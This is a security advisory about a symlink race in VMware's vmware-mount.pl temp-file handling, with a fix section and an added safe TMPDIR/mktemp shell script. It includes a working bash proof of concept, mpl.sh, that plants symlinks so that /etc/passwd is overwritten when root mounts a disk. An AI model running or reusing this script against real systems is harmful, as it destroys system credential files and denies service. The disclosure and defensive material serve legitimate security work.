COMMAND

    VMware

SYSTEMS AFFECTED

    VMware

PROBLEM

    Paul Starzetz found the following.  There is a symlink vulnerability
    in the vmware-mount.pl script which comes with the latest VMware.

    While mounting virtual disk drives using the vmware-mount.pl
    script, a temporary file named vmware-mount.pl.PID, where PID is
    the current pid of the command, is created in an insecure manner.
    This allows an attacker to overwrite any local file if root mounts
    a VMware virtual partition (mounting is usually done as root).

    Example:

        paul@ps:/tmp > id
        uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
        paul@ps:/tmp > ./mpl.sh

        VMware local /etc/passwd DoS
        By Ihq.

             linking /etc/passwd to /tmp
        [+] please wait for root to run vmware-mount.pl

    After running vmware-mount.pl:

        paul@ps:/tmp > id
        uid=500 gid=100(users) Gruppen=100(users),90(firewall)

    Obviously the passwd file has been overwritten:

        paul@ps:/tmp > cat /etc/passwd

        Nr      Start       Size Type Id Sytem
        -- ---------- ---------- ---- -- ------------------------
         1         63    2096577 BIOS  C Win95 FAT32 (LBA)

    mpl.sh:

    #!/bin/bash
    
    declare -i n
    declare -i mx
    
    n=2
    mx=32767
    
    echo
    echo "VMware local /etc/passwd DoS"
    echo "By Ihq."
    echo
    
    echo "     linking /etc/passwd to /tmp"
    
    while test $n -lt $mx ; do
            ln -s /etc/passwd /tmp/vmware-mount.pl.$n
            n=$(($n + 1))
    done
    
    echo "[+] please wait for root to run vmware-mount.pl"
    echo

SOLUTION

    VMware uses the TMPDIR variable when it is set, so give it a good,
    safe one; the script falls back to /tmp only when TMPDIR is unset:

        $ grep TMP vmware-mount.pl
          return defined($ENV{TMPDIR}) ? $ENV{TMPDIR} : "/tmp";

    This is a simple variation on an old theme.  Make sure you have
    safe TMP and TMPDIR variables set at all times.  If you want a set
    of scripts for safely creating such dirs and setting env vars at
    login time, see TMPDIR scripts at

        http://www.tux.org/~peterw/
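
    The login-time TMPDIR setup described above, as an added example
    (not the scripts at the URL above and not VMware's code).  It also
    creates the scratch file with mktemp instead of a NAME.PID path.
    The tmp-<uid> directory name and both function names are
    assumptions.

```shell
#!/bin/sh
# Added example, not VMware's or the advisory author's code.
# The directory name tmp-<uid> is a hypothetical naming scheme.

# Create (or safely reuse) a private per-user temp directory under BASE.
# Prints the path on success; returns 1 if the name is already taken by
# anything other than a mode-700 directory owned by the caller.
setup_private_tmpdir() {
    base=${1:-/tmp}
    uid=$(id -u)
    dir="$base/tmp-$uid"

    # mkdir without -p fails if the name exists, even as a dangling
    # symlink, so a pre-planted link is never followed.
    if mkdir -m 700 -- "$dir" 2>/dev/null; then
        printf '%s\n' "$dir"
        return 0
    fi

    # Name already exists: inspect the entry itself with one listing
    # (ls -ld does not follow a symlink given as the operand).
    info=$(ls -ldn -- "$dir" 2>/dev/null) || return 1
    read -r perms links owner rest <<EOF
$info
EOF
    case $perms in
        drwx------*) ;;          # real directory, no group/other access
        *) return 1 ;;           # symlink, file, or too-permissive mode
    esac
    [ "$owner" = "$uid" ] || return 1
    printf '%s\n' "$dir"
}

# Create a scratch file with an unpredictable name instead of NAME.$$.
# mktemp opens with O_EXCL, so an existing file or symlink is not reused.
make_scratch_file() {
    mktemp "${TMPDIR:-/tmp}/${1:-scratch}.XXXXXX"
}

# Login-time use (e.g. in ~/.profile):
#   TMPDIR=$(setup_private_tmpdir /tmp) && TMP=$TMPDIR && export TMPDIR TMP
```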